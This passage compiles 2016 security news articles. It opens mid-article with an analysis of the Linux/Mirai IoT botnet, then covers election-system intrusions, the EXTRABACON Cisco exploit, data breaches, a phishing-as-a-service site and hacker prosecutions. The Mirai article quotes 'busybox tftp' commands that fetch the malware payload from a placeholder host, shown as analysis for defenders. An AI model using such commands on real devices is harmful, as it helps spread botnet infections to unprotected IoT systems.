And continues: “The threat was starting campaign in early August even if this ELF is not easy to be detected since it is not showing its activity soon after being installed: it sits in there and during that time, no malware file will be left over in system, all are deleted except the delayed process where the malware is running after being executed.”

This means that when the infections succeeded, it is not easy to distinguish an infected system by a not infected one, except than from the memory analysis, and we are talking about a kind of devices that are not easy to analyze and debug. The normal kind of analysis conducted from the file system or from the external network traffic doesn’t give any evidence, at the beginning.

We are in a hostile environment, called Internet of Things (IoT), shaping new kind of powerful Botnets spreading worldwide, but which Countries are more exposed to this kind of attack?

“Countries that are having Linux busybox IoT embedded devices that can connect to the internet, like DVR or Web IP Camera from several brands, and countries who have ISP serving users by Linux routers running with global IP address, are exposed as target, especially to the devices or services that is not securing the access for the telnet port (Tcp/23) service“

In fact seems that he continues, “the Linux/Mirai creators succeed to encode the strings and making diversion of traffic to camouflage themself. As is possible to see analyzing the samples, shown in the link to Virustotal the best detection is only “3 of 53” or “3 to 55.”

What is very important for all the sysadmins is to be provided by a shield against these infections: “along with the good friends involved in the open filtration system, security engineers are trying to push” – says again MalwareMustDie – “the correct filtration signature to alert the sysadmins if having the attacks from this threat. And on one pilot a sysadmins provided with the correct signatures, found the source attack from several hundreds of addresses within only a couple of days.”

Then it seems that the infection is really going widespread and the Botnet seems to be really very large.

At the moment for all the sysadmins who want to protect their systems there is a list of mitigations actions:

If you have an IoT device, please make sure you have no telnet service open and running.
Blocking the used TCP/48101 port if you don’t use it, it’s good to prevent infection & further damage,
Monitor the telnet connections because the Botnet protocol used for infection is the Telnet service,
Reverse the process looking for the strings reported in the MalwareMustDie detections tool tips.
But, what we know about this Linux/Mirai ELF malware exactly, and why it is not so common among the malware analysts?

“The reason why not so many people know it”, says MalwareMustDie – “is that antivirus thinks it is a variant of Gafgyt or Bashlite or Bashdoor. Then, the real samples of this malware is hard to get since most malware analysts have to extract it from memory on an infected device, or maybe have to hack the CNC to fetch those.”

This means that also the forensic analysis can be difficult if we switch off the infected device: all the information would be lost and maybe it would be necessary start again with a new infection procedure, in case. It remembers the Greek mobile wiretap named “Vodafone Hack”, no evidence than in the memory.

But in your opinion which is the main difference among the previous ELF malware versions?

“The actors are now having different strategy than older type of similar threat.” – says MalwareMustDie – “by trying to be stealth (with delay), undetected (low detection hit in AV or traffic filter), unseen (no trace nor samples extracted), encoded ELF’s ASCII data, and with a big “hush-hush” among them for its distribution. But it is obvious that the main purpose is still for DDoS botnet and to rapidly spread its infection to reachable IoTs by what they call it as Telnet Scanner. ”

The real insidiously of this ELF is that the only way to track it is to extract it from the memory of the running devices and there is not so much expertise among people that can “hack their own routers or webcam or DVR to get the malware binary dumped from the memory or checking the trace of infection.”

Digging in the details: how the infection works.

Attackers hacked IoT devices via SSH or Telnet account exploiting known vulnerabilities or using default passwords that were not changed by the owner of the targeted systems.

DVR surveilance

As we read in the last post on the MalwareMustDie blog, this kind of ELF uses a specific technique to fork into a new process if the conditions of the infection of the current device are targeted, otherwise the node is safe and the installation does not go on.

Once gained a shell access on the device, the attackers will download the payload of the ELF Linux/Mirai malware, below an example of the command launched on an IoT device to perform the operation:

‘busybox tftp‘ -r [MalwareFile] -g [IPsource]
‘busybox tftp‘ -g -l ‘dvrHelper’ -r [MalwareFile] [IPsource]

It was very difficult to analyze the Linux/Mirai infection because once executed the malware is also able to delete traces of its presence.

“In some cases of the Linux/Mirai infection is showing traces that the malware was executed without parameter and there are cases where the downloaded malware file(s) is deleted after execution. In this case, mostly you won’t get the samples unless you dump the malware process to the ELF binary. This explains it is hard to get the good working samples for this new threat.” continues the MalwareMustDie team.

“Upon execution the malware will be self-deleted to avoid the trace, but the process is running. In some IoT that can be seen in lsof or the list to the /proc with specific PID, i.e.:”

/proc/{PID}/exe -> ‘/dev/.{something}/dvrHelper’ (deleted)
/proc/{PID}/exe -> ‘./{long alphabet strings}’ (deleted)

While the process runs, the malware opens the PF_INET, a UNIX networking socket for TCP, and binds it to the port TCP/48101 from localhost IP address and then starting to listen to the incoming connection. The malware forks to a new process with a new process PID, “the infected device will perform connection on telnet services on other devices for the further abuse purpose.”

The experts also provided a way to reverse a running process with a tool that will go open-source: for the details, enjoy the analysis.

Evidence on hacks of the US State Election Systems suggest Russian origin
6.9.2016 securityaffairs Hacking

Researchers have found links between the attacks on US state election systems and campaigns managed by alleged Russian state-sponsored hackers.
Security experts at threat intelligence firm ThreatConnect have conducted an analysis on the IP addresses listed in the flash alert issued in August by the FBI that warned about two cyber attacks against the election systems in two U.S. states.

The FBI confirmed that foreign hackers have penetrated state election systems, federal experts have uncovered evidence of the intrusion. The hackers violated the databases of two state election systems for this reason the FBI issued the flash alert to election officials across the country inviting them to adopt security measured to protect their computer systems.

“The FBI warning, contained in a “flash” alert from the FBI’s Cyber Division, a copy of which was obtained by Yahoo News, comes amid heightened concerns among U.S. intelligence officials about the possibility ofcyberintrusions, potentially by Russian state-sponsored hackers, aimed at disrupting the November elections.”reported Yahoo News that obtained a copy of the “flash” alert.

FBI alert state election systems

The FBI alert contains technical details about the attacks, including the IP addresses involved in the both attacks that have been analyzed by ThreatConnect.

The TTPs adopted by attackers suggest the involvement of Russian hackers, one of the IP addresses included in the alert has surfaced before in Russian criminal underground hacker forums. Some of the IPs are owned by the FortUnix Networks firm that was known to the security experts because its infrastructure was exploited by attackers that hit in December the Ukrainian power grid with the Black Energy malware.

The experts revealed that one of them was used in the past in spear-phishing campaigns that targeted the Justice and Development (AK) Party in Turkey, the Freedom Party in Germany, and the Ukrainian Parliament.

“However, as we looked into the 5.149.249[.]172 IP address within the FBI Flash Bulletin, we uncovered a spear phishing campaign targeting Turkey’s ruling Justice and Development (AK) Party, Ukrainian Parliament, and German Freedom Party figures from March – August 2016 that fits a known Russian targeting focus and modus operandi.” states the analysis published by ThreatConnect”As we explored malicious activity in the IP ranges around 5.149.249[.]172 we found additional linkages back to activity that could be evidence of Russian advanced persistent threat (APT) activity. This connection around the 5.149.249[.]172 activity is more suggestive of state-backed rather than criminally motivated activity, although we are unable to assess which actor or group might be behind the attacks based on the current evidence.”

The phishing campaigns mentioned in the analysis exploited an open source phishing framework named Phishing Frenzy, the security experts managed to hack into the control panel of the system used by the phishers and discovered a total of 113 emails written in Ukrainian, Turkish, German and English.

Out of the 113 total emails, 48 of them are malicious messages targeting Gmail accounts, while the rest were specifically designed to look like an email from an organization of interest for the victims.

16 of the malicious email used to target AK Party officials were also included in the WikiLeaks dump of nearly 300,000 AK Party emails disclosed in July.

The experts from ThreatConnect discovered some connections to a Russian threat actor, alleged linked to the Government of Moscow. One of the domains hosting the phishing content was registered with an email address associated with a domain known to be used by the infamous APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy).

Below the evidence collected by experts at ThreatConnect that suggest the involvement of the Russian Government, “but do not prove” it:

Six of the eight IP addresses belong to a Russian-owned hosting service
5.149.249[.]172 hosted a Russian cybercrime market from January – May 2015
Other IPs belonging to FortUnix infrastructure – the same provider as 5.149.249[.]172 – were seen in 2015 Ukraine power grid and news media denial of service attacks
The Acunetix and SQL injection attack method closely parallel the video from a purported Anonymous Poland (@anpoland) handle describing how they obtained athlete records from Court of Arbitration for Sport (CAS).
US Election Systems hack analysis

Enjoy the analysis.

NSA EXTRABACON exploit still threatens tens of thousands of CISCO ASA boxes
6.9.2016 securityaffairs BigBrothers

Two security experts from the Rapid 7 firm revealed that tens of thousands of CISCO ASA boxes are still vulnerable to the NSA EXTRABACON exploit.
A few weeks ago the Shadow Brokers hacker group hacked into the arsenal of the NSA-Linked Equation Group leaked online data dumps containing its exploits.

ExtraBacon is one of the exploits included in the NSA arsenal, in August security experts have improved it to hack newer version of CISCO ASA appliance. The Hungary-based security consultancy SilentSignal has focused his analysis on the ExtraBacon exploit revealing that it could be used against the newer models of Cisco’s Adaptive Security Appliance (ASA).

The security firm has demonstrated that the NSA-linked Cisco exploit dubbed ExtraBacon poses a bigger threat than previously thought.
Initially, the ExtraBacon exploit was restricted to versions 8.4.(4) and earlier of the CISCO ASA boxes and has now been expanded to 9.2.(4).

CISCO ASA Software 2

The EXTRABACON tool exploits the CVE-2016-6366 vulnerability to allow an attacker who has already gained a foothold in a targeted network to take full control of a CISCO ASA firewall. The EXTRABACON tool leverages on a flaw that resides in the Simple Network Management Protocol (SNMP) implemented by the ASA software.

“A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the advisory published by CISCO.

“The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP. An attacker could exploit this vulnerability by sending crafted SNMP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.”

At the end of August CISCO started releasing patches for its ASA software to address the Equation Group’s EXTRABACON exploit included in the NSA data dump leaked online.

Network administrators that manage CISCO ASA 7.2, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6 and 8.7 have to update their installations to version 9.1.7(9) or later. The vulnerability has been fixed in the ASA 9.1, 9.5 and 9.6 with the release of versions 9.1.7(9), 9.5(3) and 9.6.1(11).

Experts estimated that tens of thousands of Cisco ASA firewalls are vulnerable to an authentication bypass exploit.

The bad news

Unfortunately, two security experts from the Rapid 7 firm, Derek Abdine and Bob Rudis, revealed that tens of thousands of ASA appliance are still vulnerable to the EXTRABACON attack judging by the time of the last reboot.

The security duo scanned roughly 50,000 ASA devices that were identified in a previous reconnaissance and analysed the last time reboot times.

Some 10,000 of the 38,000 ASA boxes had rebooted within the 15 days since Cisco released its patch, an information that confirms that roughly 28,000 devices are still vulnerable because they were not patched. The remaining 12,000 devices did not provide the information of the last reboot.

Going deep into the analysis, the researchers discovered that unpatched devices belong to four large US firms, a UK government agency and a financial services company, and a large Japanese telecommunications provider.

Extrabacon still vulnerable organizations

What does it means?

It means that the above organizations are using vulnerable CISCO ASA Boxes if the following condition are matched:

the ASA device must have SNMP enabled and an attacker must have the ability to reach the device via UDP SNMP (yes, SNMP can run over TCP though it’s rare to see it working that way) and know the SNMP community string
an attacker must also have telnet or SSH access to the devices
Of course, the exploiting of ExtraBacon is not so simple, anyway, it is possible when dealing with persistent attackers.

“This generally makes the EXTRABACON attack something that would occur within an organization’s network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit.” wrote Abdine and Rudis.

“Even though there’s a high probable loss magnitude from a successful exploit, the threat capability and threat event frequency for attacks would most likely be low in the vast majority of organisations that use these devices to secure their environments.”

“Having said that, Extra Bacon is a pretty critical vulnerability in a core network security infrastructure device and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organisations to deploy the patch as soon as they can obtain and test it.”

The security duo is warning the above organisations which could not underestimate the risk of exposure to EXTRABACON attacks.

Porn Brazzersforum hacked, nearly 800,000 Brazzers Accounts Exposed
6.9.2016 securityaffairs Hacking

A data breach affected a the Brazzersforum resulting in the exposure of 800,000 accounts of the popular porn site Brazzers.
Another week starts with a data breach, roughly 800,000 accounts of the porn site Brazzers have been compromised. The data breach affected a separate forum, anyway, Brazzers users who never signed up to the forum may have been impacted.

The news was reported by Motherboard who received the dump from the data breach monitoring website Vigilante.pw. The leaked archive includes 928,072 records, 790,724 distinct email addresses, usernames and passwords in plaintext.

Motherboard journalists were supported by the popular security expert Troy Hunt to verify the authenticity of the leaked details, he confirmed a number of their details from the data dump belong to Brazzers users.

“This matches an incident which occurred in 2012 with our ‘Brazzersforum,’ which was managed by a third party. The incident occurred because of a vulnerability in the said third party software, the ‘vBulletin’ software, and not Brazzers itself.” explained Matt Stevens, a company spokesman.

The company downgraded the extension of the data breach explaining that only a small portion of users were impacted.

“That being said, users’ accounts were shared between Brazzers and the ‘Brazzersforum‘ which was created for user convenience. That resulted in a small portion of our user accounts being exposed and we took corrective measures in the days following this incident to protect our users,” Stevens added.

There is a strange particular emerged in the story, Motherboard contacted two Brazzers users to verify the authenticity of their data, both confirmed the genuinity of the records, but said that they had not accessed the Brazzersforum.

The forum allows Brazzers users to discuss porn content or to suggest new scenarios for future productions.

Brazzer forum runs the vBulletin, one of the most popular platforms for web forums. Old vBulletin versions are affected by several vulnerabilities easy to exploit, it is likely that hackers exploited one of them to steal the records.

At the time of writing, Brazzersforum is under maintenance.

Brazzers forum data breach

In response to the data breach Brazzers banned all the inactive accounts present in the dump.

“Note that the data provided contains many duplicates and non-functional accounts. We banned all non-active accounts in that list in case those usernames and passwords are re-used in the future,” Matt Stevens, public relations manager from Brazzers, told Motherboard.

“Brazzers takes the privacy and safety of its users very seriously,”

Hong Kong Government Hacked by APT3 Group before elections
4.9.2016 securityaffairs APT

Two Hong Hong government departments were targeted by Chinese hackers belonging the APT3 group just before the legislative elections.
Security experts from FireEye have discovered a new cyber espionage campaign launched by the Chinese APT3 group against Hong Kong Government before upcoming parliamentary elections that are to be held today September 4.

The hackers targeted two Hong Kong government departments to steal information related upcoming elections.
APT3 hackers used spear-phishing emails to lure victims to websites used to deliver malicious code on victims’ PC. According to FireEye, the malicious phishing emails claimed to include information about a report on election results, they include a link to the malicious website.


APT3 was first spotted by FireEye in 2014, the ATP group was using exploits targeting recently disclosed vulnerabilities in Windows. The experts at FireEye speculated the APT3 is the same actor behind the “Operation Clandestine Fox” uncovered by the company in April 2014. The hackers exploited an IE zero-day vulnerability in a series of targeted attacks.

FireEye reported in a blog post the details of the attacks run by the APT3 that exploited the Windows OLE bug and also another Windows privilege escalation vulnerability (CVE-2014-4113).

Cyber espionage campaigns conducted to gather information about government and political activities in Southeast Asia are not a novelty, the Government of Beijing is one of the most active in this sense.

“Typically when we see government attacks on other governments, it’s about intelligence gathering and trying to gain access to information they can’t get via other means,” Bryce Boland, FireEye CTO for the Asia-Pac, told Agence France-Presse.

China always made political pressure on the local Honk Kong government to discredit political opponents and those candidates that fight for the independence of the country.

Leakedsource breach notification service reported two Bitcoin Data Breaches
4.9.2016 securityaffairs Hacking

Now LeakedSource disclosed details from two Bitcoin data breaches that affected the bitcoin exchange BTC-E.com and the discussion forum Bitcointalk.org.
The data breach notification service LeakedSource is becoming familiar to my readers, recently it reported the data breach suffered by many IT services, including Last.fm and DropBox, both occurred in 2012. Now LeakedSource disclosed details from two Bitcoin data breaches that affected the Bitcoin sector, the incident were suffered by the bitcoin exchange BTC-E.com and the bitcoin discussion forum Bitcointalk.org.

The incident occurred at the Bitcointalk.org was disclosed in May when the servers of the forum were compromised by attackers.

BitcoinTalk @bitcointalk
Server compromised due to social engineering against ISP NFOrce. There will be extended downtime for forensic analysis and reinstall.
03:14 - 22 Maggio 2015
227 227 Retweet 84 84 Mi piace
“The forum’s ISP NFOrce managed to get tricked into giving an attacker access to the server. I think that the attacker had access for only about 12 minutes before I noticed it and had the server disconnected, so he probably wasn’t able to get a complete dump of the database. However, you should act as though your password hashes, PMs, emails, etc. were compromised.” was reported on Reddit by the theymos user.”The forum will probably be down for 36-60 hours for analysis and reinstall. I’ll post status updates on Twitter @bitcointalk and I’ll post a complete report in a post in Meta once the forum comes back online.”

“each password has a 12-byte unique salt. The passwords are hashed with 7500 rounds of SHA-256.” he added.

LeakedSource reported that 499,593 user details were stolen in the incident, the leaked records include usernames, passwords, emails, birthdays, secret questions, hashed secret answers and some other internal data.

91% of passwords were hashed with sha256crypt, the experts explained that and that it would take about a year to crack an estimated 60-70% of them.

9% were hashed with MD5 and all were protected with the same salt value, LeakedSource has already cracked approximately 68% of those.


More mysterious was the BTC-E.com incident, it is possible that hackers also compromised some users’ wallets stealing bitcoins.

Despite the LeakedSource’s notification, there is no news about incidents occurred to BTC-E customers.

In January 2016 the Financial Underground Kingdom blog reported that the exchange has suffered one hack without effects for its customers, it is likely the data leaked by LeakedSource are related that incident.

“During years of existance [BTC-E] had just 1 hack after which the owners paid all the debt to users.”

It isn’t clear whether that hack and the data disclosure made by LeakedSource refer to the same incident. LeakedSource reported that that BTC-E.com was hacked in October 2013 and 568,355 users were impacted.

The passwords were protected with an unknown hashing method, making the “passwords completely uncrackable although that may change.”

Fake-Game offers a Phishing-as-a-Service platform to wannabe criminals
4.9.2016 securityaffairs Spam

Experts from Fortinet discovered a Russian website called Fake-Game the offers a Phishing-as-a-Service platform to anyone.
The Phishing attacks are still one of the most effective methods to grab users’ credentials on the web.

Experts from Fortinet have discovered a Russian-language site called ‘Fake-Game’ that offers Phishing-as-a-Service.

“During our monitoring, we discovered that this same business model is also being used in phishing schemes in the form of a Russian website called “Fake-Game.” Appearing in (at least) July 2015, Fake-Game offers a Phishing-as-a-Service (PHaaS) platform to anyone who signs up on their website:” reads a blog post published by Fortinet.

Fake-Game phishing website

“You’ve come to the site to hijack accounts,” reads the translation of the message that the website displays.

The website is free to use, but it also offers a paid version for VIP accounts that includes additional features such as the possibility to browse all other phished accounts.

The Fake-game was used to hack into over 688,610 accounts, this is what the authors claim, it is easy to use and includes also video tutorials.

Fake-Game phishing VIP account

Users only have to choose which type of credential they wish to grab (i.e. Facebook, Instagram, Google, etc.)

The Fake-Game then generates a URL with a unique ID for each user.

“The link is appended by an affiliate ID which, in this case, is our subscriber’s ID. This allows the website to track which stolen accounts belong to which subscriber.” continues the Fortinet post.

“A subscriber can then spread the phishing site to prospective victims. Once a victim enters a credential into the subscriber’s phishing link, a prompt showing the stolen information appears:”

Fake-Game phishing linkjpeg

The Fake-Game is a classic example of crime-as-a-service, similar services allow wannabe criminals to rent infrastructure and service to easily enter the cyber criminal arena.

Fake-Game users only need to trick victims into clicking on the Phishing URL.

Crime-as-a-service dramatically lowers the barrier for entry in the cyber criminal ecosystem.

Dutch Police Seize Two VPN Servers, But Without Explaining... Why?
3.9.2016 thehackernews Security
Recently, two European countries, France and Germany, have declared war against encryption with an objective to force major technology companies to built encryption backdoors in their secure messaging services.
However, another neighborhood country, Netherlands, is proactively taking down cyber criminals, but do you know how?
Dutch Police has seized two servers belonging to Virtual Private Network (VPN) provider Perfect Privacy, as part of an investigation, without even providing any reason for seizures.
Switzerland-based VPN provider said they came to know about the servers seizure from I3D, the company that provides server hosting across Rotterdam.
For those unfamiliar, Virtual Private Networks or VPNs are easy security and privacy tools that route your Internet traffic through a distant connection, protecting your browsing, hiding your location data and accessing restricted resources.
VPNs have now become a great tool not just for large companies, but also for individuals to improve their privacy and security online, dodge content restrictions and counter growing threat of cyber attacks.
While many people, including digital activists, journalists, and protesters, use them for legitimate purposes, VPNs are also used by criminals and black hat hackers to protect their nefarious activities from prying eyes and stay anonymous online.
This is why VPN services are frequently targeted by police and law enforcement while investigating crimes, and this is what appears to have happened with two servers belonging to Perfect Privacy.
The VPN provider informed its customers that two of its servers in Rotterdam, Netherlands had been seized by the Dutch police on Thursday, August 24, without even contacting the company to inform about a possible investigation or the reason why their servers were brought down.
The VPN provider says the authorities went directly to I3D with a subpoena requesting the hardware.
"Currently, we have no further information since the responsible law enforcement agency did not get in touch with us directly, we were merely informed by our hoster," Perfect Privacy explains. "Since we are not logging any data there is currently no reason to believe that any user data was compromised."
Perfect Privacy confirms that the company was back up and running the following day after I3D provided two replacement servers, meaning that the seizures did not result in any significant outage.
In April, Dutch Police seized Ennetcom servers based in the Netherlands and Canada to shut down their operations during a criminal investigation. Ennetcom was a company that sold customized Blackberry Phones with the secure PGP-encrypted network.
Dutch authorities accused Ennetcom of helping criminals protect their communications to carry out crimes, involving drug trafficking, assassinations, and other serious offenses.

Hacker Who Hacked Official Linux Kernel Website Arrested in Florida
3.9.2016 thehackernews Hacking
Around five years after unknown hackers gained unauthorized access to multiple kernel.org servers used to maintain and distribute the Linux operating system kernel, police have arrested a South Florida computer programmer for carrying out the attack.
Donald Ryan Austin, a 27-year-old programmer from of El Portal, Florida, was charged Thursday with hacking servers belonging to the Linux Kernel Organization (kernel.org) and the Linux Foundation in 2011, the Department of Justice announced on Thursday.
The Linux Kernel Organization runs kernel.org servers for distributing the Linux operating system kernel, which is the heart of the operating system, whereas the Linux Foundation is a separate group that supports kernel.org.
According to an indictment [PDF] unsealed by federal prosecutors on Monday, Austin managed to steal login credentials of one of the Linux Kernel Organization system administrators in 2011 and used them to install a hard-to-detect malware backdoor, dubbed Phalanx, on servers belonging to the organization.
But what made the breach much significant? It's the open-source operating system that's being used by Millions of corporate and government networks worldwide.
Using the Phalanx malware, Austin allegedly installed Ebury – a Trojan designed for Linux, FreeBSD or Solaris hacking – on a number of servers run by the Linux groups, which helped him gain access to the login credentials of people using the servers.
Austin allegedly infected Linux servers, including "Odin1," "Zeus1," and "Pub3," which were leased by the Linux Foundation for operating kernel.org. He also hacked the personal email server of Linux Kernel Organization’s founder Peter Anvin.
Austin is also accused of allegedly using his unauthorized admin privileges to insert messages into the system that would display when the servers restarted.
According to prosecutors, Austin's motive for the intrusion was to gain early access to Linux software builds distributed through the www.kernel.org website.
Bad Luck! Hacker Arrested while Breaking Traffic Rules
This security breach forced the Linux Foundation to shut down kernel.org completely while a malware infection was cleared up, and rebuild several of its servers. Miami Shores Police stopped Austin while breaking traffic rules on August 28 and then arrested after identified as a suspect in 2011 case.
Austin is charged with 4 counts of "intentional transmission causing damage to a protected computer." He was released from jail on a bond of $50,000 provided by the family of his girlfriend.
Judge has ordered Austin to stay away from the Internet, computers, and every type of social media or e-mail services, due to his "substance abuse history."
Austin is scheduled to appear in San Francisco federal court on September 21 before the Honorable Sallie Kim, and if found guilty, he faces a possible sentence of 40 years in prison as well as $2 Million in fines.

Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data

3.9.2016 securityaffairs BigBrothers

Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data and passport details of foreign visitors to Armenia.
A group of Azerbaijani hacktivists has leaked the passport details of foreign visitors to Armenia.

The data breach exposed the Internal resources of the Security Service (SNS) that are involved in the process of updating information about passports of foreign passports.

The hackers breached Armenian government servers stealing sensitive data, including passport scans. Intelligence experts who analyzed the data leaks confirmed their authenticity.

The Anti-Armenia Team took credit for a series of data leaks that the hackers claim were stolen from servers of Armenian national security ministry.

“We would like to notice that Anti – Armenia team is an independent group, who is active for five years and repeatedly makes anxious Armenian side by its cyber attacks,” the group explained to El Reg.

Armenia and Azerbaijan are neighbouring countries that engaged a war over the disputed Nagorno-Karabakh region between 1988 and 1994.

There is a great tension between the two countries, in April, the Azerbaijani army tried to regain control of the Nagorno-Karabakh Republic, but the battle caused the death of 350 people.

Azerbaijani Anti-Armenia Team
A source that has spoken to El Reg on condition of anonymity told to El Reg the leaked information is more likely to have come from an insider, excluding that the alleged Anti–Armenia team has hacked on Armenian government systems.

“I am familiar with the incident, and [can] confirm, that such attacks really happened, and the documents are legitimate and not fake,” the source told el Reg. “I have more confidence that one of their employees having access to it has been compromised and technical border control service is a part of SNS (Security Service), that’s why there is such overlap, and the documents could be stolen from particular person, and not ‘systems’, like they claim.”

The notorious Hacker Guccifer sentenced 52 months in US prison
3.9.2016 securityaffairs Crime

The notorious Romanian hacker Guccifer has been sentenced to 52 months in prison by a US court for aggravated identity theft and hacking.
The notorious Romanian hacker Guccifer has been sentenced to prison by a US court.

Marcel Lehel Lazar (44), this is the real name of Guccifer, has been sentenced to 52 months in prison for aggravated identity theft and hacking into to a protected computer.

Guccifer was arrested in January 2014 in Romania, where he was known to law enforcement for hacking into the accounts of local celebrities. In June 2014 he was pleading guilty and sentenced by a Romanian court to 7 years in prison for accessing the email accounts of the head of the Romanian intelligence service, George Maior, and of the politician Corina Cretu.

In March 2016, the Romanian authorities accepted the US request for Lazar’s extradition.

Guccifer is very popular in the hacking community, but he became famous to the public after hacking the online accounts of numerous public figures, including members of the Bush family, journalists, actors, former members of the U.S. Cabinet and the U.S. Joint Chiefs of Staff, former Secretary of State Colin Powell, the senior political member Sidney Blumenthal and a former presidential advisor.

Lazar also claimed to have hacked the Hillary Clinton’s private email server, in the past months he had a series of interviews with Fox and NBC News outlets, providing details about his intrusion.

Guccifer exploited Clinton’s connection with Blumenthal to access her email server.

Lazar first got into Blumenthal’s AOL email, in March 2013, through detailed Internet research to help him guess Blumenthal’s security question. From Blumenthal’s email, Lazar was then able to track emails based on IP headers and ultimately gain access to the Clinton email server.

Lazar described the server to NBC News (from a Bucharest jail cell) as, ‘an open orchid on the Internet’ where he was able to find ‘hundreds of folders’. While he says he only accessed the server twice, he claims to have obtained 2-gigabytes of information. He has thus far refused to provide any of the emails to which he gained access. Of the 2-gigabytes of information, he has told Fox News they are hidden because they are ‘too hot’ and ‘a matter of national security’.

Guccifer hacked Hillary Clinton email server
Source The Telegraph

It has been of concern about who has had access to the Clinton email server. Lazar has said he was able to see ‘up to 10,…, IPs from other parts of the world.’ Research into emails during Clinton’s time as Secretary of State has already shown approximately 2,200 emails that contained classified information, with some identified as “Top Secret”.

According to US authorities, the hacker admitted having hacked email and social media accounts of roughly 100 Americans between October 2012 and January 2014.

Kali Linux 2016.2 — Download Latest Release Of Best Operating System For Hackers
2.9.2016 thehackernews OS
As promised at the Black Hat and Def Con security and hacking conferences, Offensive Security – the creators of Swiss army knife for researchers, penetration testers, and hackers – has finally released the much awaited Kali Linux 2016.2.
Kali Linux is an open-source Debian-based Linux distribution designed to help ethical hackers and security professionals with a wide range of tools for penetration testing, forensics, hacking and reverse engineering together into a single package.
Earlier the Kali Linux distribution was known as BackTrack.
Kali Linux 2016.2 is an updated Live ISO image of the popular GNU/Linux distribution that includes the latest software versions and enhancements for those who want to deploy the operating system on new systems.
What's new?
Besides bringing the updated Live ISOs of Kali Linux, the Kali Linux team brings multiple variants of the GNU/Linux distribution with various Desktop Environments, specifically KDE, Xfce, MATE, LXDE, and Enlightenment – all available only for 64-bit platforms.
What's even more exciting is that, from Kali Linux 2016.2 onwards, the team promises to release updated Live ISO images of Kali with new software versions and the latest security patches every week.
Since Kali Linux has been the most advanced and widely used distro for penetration testing and forensics, this weekly update has come up as exciting news for those involved in various hacking and security-related projects.
It's been several months since the last update to the official Kali Linux Live ISOs, and there are a few hundred new or updated packages pushed to the Kali repositories.
This means that the packages incorporated in the previous Kali Linux ISOs need bug fixes and OS improvements, which are implemented in the most recent versions of the Linux distro.
"Since our last release several months ago, there's a few hundred new or updated packages which have been pushed to the Kali reports," the Kali Linux team's announcement reads. "This means that anyone downloading an ISO even 3 months old has somewhat of a long 'apt-get dist-upgrade' ahead of them."
You can download the latest Kali Linux 2016.2 ISOs from its official website now. The Kali Linux team has also promised to bring a lot of exciting announcements in the next few weeks, so keep an eye on its announcements for the latest updates.

Hey, Music Lovers! Last.Fm Hack Leaks 43 Million Account Passwords
2.9.2016 THEHACKERNEWS Social
Another Day, Another Data Breach!
If you love to listen to music online and have an account on Last.fm website, your account details may have compromised in a data breach that leaked more than 43 Million user personal data online.
Last.fm was hacked in March of 2012 and three months after the breach, London-based music streaming service admitted to the incident and issued a warning, encouraging its users to change their passwords.
But now it turns out that the Last.fm data breach was massive, and four years later the stolen data have surfaced in the public.
The copy of the hacked database obtained by the data breach indexing website LeakedSource contained 43,570,999 user records that were originally stolen from Last.fm on March 22, 2012, according to timestamps in the database.
The leaked records include usernames, hashed passwords, email addresses, the date when a user signed up to the website, and ad-related data.
Wait! Have you visited The Hacker News early this week? We reported about the Dropbox massive data breach that had also occurred in 2012, which let hackers get their hands on online cloud storage accounts of more than 68 Million users.
People Are Still So Bad At Picking Passwords
But what makes the Last.fm hack much worse is the weak security measures the website used to store its users’ passwords.
Lat.fm stored its users’ passwords using MD5 hashing – which has been considered outdated even before 2012 – and that too without any Salt, a random string added to strengthen encrypted passwords that make it more difficult for hackers to crack them.
LeakedSource says it took them just 2 hours to crack 96% of all the passwords included in the Last.fm data dump, which is possible due to the use of an unsalted MD5 hashing system to store passwords.
"This algorithm is so insecure it took us two hours to crack and convert over 96 percent of them to visible passwords," LeakedSource said in its blog post. adding that it recently significantly invested in its own "password cracking capabilities for the benefit of our users."
And guess what? Last.fm's analysis of the password reveals that the most popular passwords users kept securing their accounts were extremely weak.
255,319 people used the phrase 123456
92,652 used 'password' as password
Almost 67,000 used 'lastfm'
Around 64,000 used 123456789
46,000 used 'qwerty'
Almost 36,000 used 'abc123'
LeakedSource added the data into its database; so if you have a Last.fm account, you can check if it has been compromised by searching your data at Leaked Source’s search engine.
Last.fm is the latest to join the list of "Mega-Breaches," that revealed in recent months, when hundreds of Millions of online credentials from years-old data breaches on popular social network sites, including LinkedIn, MySpace, VK.com and Tumblr, were sold on the Dark Web.
The takeaway:
Change your passwords for Last.fm account as well as other online accounts immediately, especially if you are using the same password for multiple sites.
Moreover, make use of a good password manager to create complex passwords for different websites and remember them.
We have listed some of the best password managers that could help you understand the importance of password manager as well as choose one according to your requirement.

Update your Mac OS X — Apple has released Important Security Updates
2.9.2016 THEHACKERNEWS Apple
If you own a Mac laptop or desktop, you need to update your system right now.
It turns out that the critical zero-day security vulnerabilities disclosed last week, which targeted iPhone and iPad users, affect Mac users as well.
Late last week, Apple rolled out iOS 9.3.5 update to patch a total of three zero-day vulnerabilities that hackers could have used to remotely gain control of an iPhone by simply making the victim click a link.
Dubbed "Trident," the security holes were used to create spyware (surveillance malware) called 'Pegasus' that was apparently used to target human rights activist Ahmed Mansoor in the United Arab Emirates.
Pegasus could allow an attacker to access an incredible amount of data on a target victim, including text messages, calendar entries, emails, WhatsApp messages, user's location, microphone.
Pegasus Spyware could even allow an attacker to fully download victim's passwords and steal the stored list of WiFi networks, as well as passwords the device connected to.
Apple is now patching the same "Trident" bugs in Safari web browser on its desktop operating system, with urgent security updates for Safari 9 as well as OS X Yosemite and OS X El Capitan.
However, this is not a surprise because iOS and OS X, and mobile and desktop version of Safari browser share much of the same codebase. Therefore, zero-days in Apple’s iOS showed up in OS X as well.
